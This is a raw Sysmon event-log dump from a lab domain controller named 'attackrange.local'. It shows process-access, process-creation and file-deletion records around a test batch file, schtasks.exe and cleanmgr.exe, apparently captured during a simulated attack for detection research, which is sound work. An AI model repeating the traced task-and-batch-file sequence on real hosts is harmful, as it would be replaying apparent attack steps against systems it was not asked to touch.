07:56:58.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6D7D-00000000CF01}8436C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5CA-60EB-6D7D-00000000CF01}8436C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.222{466BC892-F5CA-60EB-6D7D-00000000CF01}8436C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 3 C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-0664-60E8-6503-00000000CF01}40242340C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+21f3|c:\windows\system32\UBPM.dll+1cdb|c:\windows\system32\UBPM.dll+1b6f|c:\windows\system32\schedsvc.dll+3095b|c:\windows\system32\schedsvc.dll+175bc|c:\windows\system32\schedsvc.dll+3a8de|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001050632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+21f3|c:\windows\system32\UBPM.dll+1cdb|c:\windows\system32\UBPM.dll+1b6f|c:\windows\system32\schedsvc.dll+3095b|c:\windows\system32\schedsvc.dll+175bc|c:\windows\system32\schedsvc.dll+3a8de|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 23542300x80000000000000001050625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf6d9b5d.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.149{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.149{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.149{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE5C9B556BB20748E4DF6056F9FC4D9C,SHA256=BF780A6CD0E2C298B4CAA6E9DDF42E75A262CE8D725F3646D1B7E0B213315C01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 